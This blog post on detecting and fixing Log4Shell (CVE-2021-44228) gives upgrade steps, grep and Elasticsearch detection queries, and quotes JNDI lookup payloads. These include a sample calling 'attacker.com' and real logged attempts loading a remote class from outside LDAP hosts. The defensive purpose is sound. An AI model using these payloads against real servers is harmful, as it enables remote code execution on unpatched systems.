
log4shell

Used: Elasticsearch 7.16.1

A high severity vulnerability (CVE-2021-44228) impacting multiple versions of the Apache Log4j2 utility was disclosed publicly via the project’s GitHub on December 9, 2021.

Log4j2 is an open-source Java logging library developed by the Apache Software Foundation. It is widely used and embedded as a component in many applications, services, and products.

Since last Friday (2021-12-10), CVE-2021-44228 has hit the IT industry very hard.

The vulnerability allows for unauthenticated remote code execution, hence the name log4shell.

Impact

For non-Java stacks, this vulnerability has no direct impact: exploitation attempts against static pages or servers such as PHP or IIS will fail.

If you run Java-based software, you may be exposed and should check whether log4j or log4j2 is in use.

This zero-day exploit is a severe threat and needs to be dealt with immediately. Addressing it is a necessary task for both Operations and Application Development.

Even where other safeguards are in place, such as restricted internet connectivity and firewall rules, resolving the vulnerability is a must; you do not want to risk exposure from inside your network either. Services facing or exposed to the internet must be remediated first.

Follow the proposed mitigation and remediation for your software and infrastructure.

For instance, Elastic announced the impact on its products along with proposed mitigations, which led to urgent hotfixes and immediate action.

Analysis

The first step is to identify the components using log4j2.

Project Analysis

Typical files to inspect

  • pom.xml ⇒ Apache Maven
  • build.gradle, gradle.properties ⇒ Gradle

The respective configuration files are written in properties, JSON, YAML, or XML format.

  • log4j2.properties, log4j2.js(o)n, log4j2.y(a)ml, log4j2.xml
  • log4j2-test.properties, log4j2-test.js(o)n, log4j2-test.y(a)ml, log4j2-test.xml
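Beyond the build files, the library may also be bundled directly on disk. A quick filesystem scan helps; this is a sketch, where /opt is an example root to adjust to your deployment paths:

```shell
# List bundled log4j-core jars with their version prefixed (the version
# is part of the jar file name, e.g. log4j-core-2.14.1.jar).
find /opt -name 'log4j-core-*.jar' 2>/dev/null \
  | sed -E 's/^.*log4j-core-([0-9.]+)\.jar$/\1 &/'
# For build-managed projects, the dependency tree reveals transitive usage:
#   mvn dependency:tree -Dincludes=org.apache.logging.log4j
#   gradle dependencies | grep log4j
```

The dependency-tree check matters because log4j2 often arrives transitively, without appearing in your own pom.xml or build.gradle.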

Remediation: Upgrade to the latest version 2.16.0, as announced by the Apache Foundation

The Log4j team has been made aware of a security vulnerability, CVE-2021-44228, that has been addressed in Log4j 2.15.0. Log4j’s JNDI support has not restricted what names could be resolved. Some protocols are unsafe or can allow remote code execution. Log4j now limits the protocols by default to only java, ldap, and ldaps and limits the ldap protocols to only accessing Java primitive objects by default served on the localhost. One vector that allowed exposure to this vulnerability was Log4j’s allowance of Lookups to appear in log messages. As of Log4j 2.15.0, this feature is now disabled by default. While an option has been provided to enable Lookups in this fashion, users are strongly discouraged from enabling it.

The first fix was incomplete; late on 13th December, version 2.16.0 was released.

It was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a denial of service (DOS) attack. Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default.

Source: https://logging.apache.org/log4j/2.x/

Log Analysis

An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.

The Elastic Security Blog shared a useful gist for a series of checks.

This command searches for exploitation attempts in uncompressed files in /var/log and all subfolders:

sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
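Attackers quickly moved to obfuscated payloads such as ${${lower:j}ndi:...}, which the pattern above misses. A rough heuristic is to look for nested lookups; the count gives a first impression (adjust the path, and run with sudo if your log files require it):

```shell
# Count log lines containing nested lookups like ${${lower:j}ndi:...},
# a common obfuscation of the jndi payload.
egrep -I -i -r '\$\{[^}]*\$\{' /var/log 2>/dev/null | wc -l
```

Expect some false positives, since nested lookups can occur in legitimate configuration output; inspect the matching lines before drawing conclusions.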

If you store your logs in Elasticsearch itself, the following query lists all indices that contain messages matching the search patterns. The query is written for the Kibana Dev Console and can be translated to curl. The search patterns can and should be extended; we take the above grep command as a basis.

At this point you could also simply search for ${, since attackers have switched to obfuscation, with the final string still evaluating to jndi:ldap. To demonstrate, a quick search in Elasticsearch:

GET _search
{
  "size": 0,
  "query": {
    "bool": {
      "must": [
        {
          "bool": {
            "should": [
              {
                "simple_query_string": {
                  "query": "jndi:ldap",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:ldaps",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:rmi",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:dns",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:nis",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:iiop",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:corba",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:nds",
                  "fields": []
                }
              },
              {
                "simple_query_string": {
                  "query": "jndi:http",
                  "fields": []
                }
              }
            ]
          }
        }
      ]
    }
  },
  "aggs": {
    "applications": {
      "terms": {
        "field": "_index"
      }
    }
  }
}
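Outside Kibana, the same search can be issued with curl. Host and credentials below are placeholders, and only a single pattern is shown for brevity:

```shell
# Write the query body to a file; extend it with the other jndi:*
# patterns as in the Dev Console version above.
cat > jndi_query.json <<'EOF'
{
  "size": 0,
  "query": {
    "simple_query_string": { "query": "jndi:ldap", "fields": [] }
  },
  "aggs": {
    "applications": { "terms": { "field": "_index" } }
  }
}
EOF
curl -s -u elastic:changeme -H 'Content-Type: application/json' \
  'https://localhost:9200/_search' --data-binary @jndi_query.json \
  || echo 'request failed - is the cluster reachable?'
```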

This example is from our production logs. In comparison, searching only for ldap and ldaps returns fewer documents, so check against all the protocols above. The key field holds the names of the indices containing matching messages; doc_count is the total number of those messages. For safety reasons, index names have been replaced.

{ 
  "aggregations" : {
    "applications" : {
      "doc_count_error_upper_bound" : 0,
      "sum_other_doc_count" : 0,
      "buckets" : [
        {
          "key" : "le-mapper-test-2021.12",
          "doc_count" : 225
        },
        {
          "key" : "le-mapper-prod-2021.12",
          "doc_count" : 204
        },
        {
          "key" : "security-2021.12.11",
          "doc_count" : 4
        }
      ]
    }
  }
}

The good news: although the attacks (Sunday, 12th December) came after the exploit was published (Friday, 10th December), all systems had already been remedied by then.

What does an attack look like? LunaSec provides examples.

The attacker set their User-Agent header to: ${jndi:ldap://attacker.com/a}.

And that is exactly what we found in our logs; some examples (truncated):

"useragent" : "${jndi:ldap://foo.6k7te5so4.bar.interactsh.com/ua}"
"useragent" : "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko,+${jndi:ldap://replaced.y.psc4fuel.com/KieFO.class})+Chrome/93.0.4577.63+Safari/537.36"

The last example also attempts the lookup via the requested URL: "requestedUrl" : "/${jndi:ldap://replaced.y.psc4fuel.com/KieFO.class}".

Finding these attempts was especially insightful and rewarding, as we had taken all necessary steps to prevent exploitation. Furthermore, we have the respective IP addresses logged and can inspect, ban, or block them.
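To act on those addresses, the hits can be reduced to a unique list of source IPs. This is a sketch that assumes the client IP is the first field of the access-log line (common/combined log format); the path is an example:

```shell
# Collect unique source IPs from access logs containing jndi probes.
# -h suppresses filenames so the IP stays in the first field.
egrep -I -i -r -h '\$(\{|%7B)jndi:' /var/log/nginx 2>/dev/null \
  | awk '{print $1}' | sort -u > jndi_sources.txt
wc -l < jndi_sources.txt
# Review jndi_sources.txt manually before feeding it into firewall rules.
```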

Conclusion

Check your affected systems immediately and roll out your hotfixes!

  • Upgrade log4j2 to Version 2.16.0 or later!
  • Check the vendor/product proposals to mitigate or remediate the situation, e.g. upgrading Logstash (7.16.1, released on 13th December) or Docker images
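If an upgrade is temporarily blocked, Apache documented stopgaps; the system-property flag was later judged insufficient on its own, so treat these strictly as a bridge until the upgrade. The jar name below is an example:

```shell
# Stopgap 1 (Log4j >= 2.10): disable message lookups at JVM start.
#   java -Dlog4j2.formatMsgNoLookups=true -jar yourapp.jar
# Stopgap 2 (any 2.x version): strip the vulnerable class from the jar.
#   zip -q -d log4j-core-2.14.1.jar \
#     org/apache/logging/log4j/core/lookup/JndiLookup.class
echo "stopgaps only - schedule the upgrade to 2.16.0 or later"
```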

If that takes you a long time, it is an indicator that a change within your organisation is overdue.

It was a pleasant disruption of my regular work and thanks to the Open Source community it was quickly dealt with.
